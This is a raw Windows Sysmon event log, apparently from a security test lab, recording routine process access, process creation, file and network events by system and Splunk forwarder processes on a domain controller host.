13:54:17.553{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200561Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:17.553{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200560Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:17.553{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200559Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:17.553{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E689-6040-E24D-00000000AD01}3764C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200558Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:17.553{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E689-6040-E24D-00000000AD01}3764C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200557Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:17.554{5ABCFE62-E689-6040-E24D-00000000AD01}3764C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002200556Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:17.428{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=86F9732DECF9AC44AE5D793DB7737924,SHA256=40BABEF5C99CB63A85086D7BC51FCDF7994469CB165AF150F945FBCF03E14F27,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200586Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:18.897{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E68A-6040-E44D-00000000AD01}6156C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200585Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:18.897{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200584Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:18.897{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200583Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:18.897{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200582Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:18.897{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200581Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:18.897{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E68A-6040-E44D-00000000AD01}6156C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200580Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:18.897{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E68A-6040-E44D-00000000AD01}6156C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200579Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:18.898{5ABCFE62-E68A-6040-E44D-00000000AD01}6156C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002200578Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:18.819{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F453D0068C2A052FACF983C79ED886DA,SHA256=E400B2A9DDEDCC073ABFF0D98C53F7D2DAB66F86D078A0C469657A0C0323AAA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200577Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:18.569{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BFA8CBE953E53F4C5A48776228A6B191,SHA256=18C471BAB2ACD766F4BD902796D33CE8AEFB79055F5F7D724F49E7D70D3DB228,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200576Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:14.094{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55140-false10.0.1.12-8000- 10341000x80000000000000002200575Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:18.366{5ABCFE62-E68A-6040-E34D-00000000AD01}53766324C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200574Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:18.225{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E68A-6040-E34D-00000000AD01}5376C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200573Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:18.225{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200572Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:18.225{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200571Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:18.225{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200570Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:18.225{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200569Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:18.225{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E68A-6040-E34D-00000000AD01}5376C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200568Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:18.225{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E68A-6040-E34D-00000000AD01}5376C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200567Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:18.226{5ABCFE62-E68A-6040-E34D-00000000AD01}5376C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002200597Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:19.913{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9FFAF8FB93AA99FAD7FF8F5B0086BC7A,SHA256=C5664231693705B54E0A57EA945791CCE5CB1A522352416FDA3F6CF2D4D0BD55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200596Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:19.835{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90CA6140515BBA34BCDCF9C2A876AD74,SHA256=C556B13AB1101FA521A41A5DC769282AA8B18123592384E6E9940EAA93036663,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200595Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:19.694{5ABCFE62-E68B-6040-E54D-00000000AD01}58526196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200594Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:19.569{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E68B-6040-E54D-00000000AD01}5852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200593Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 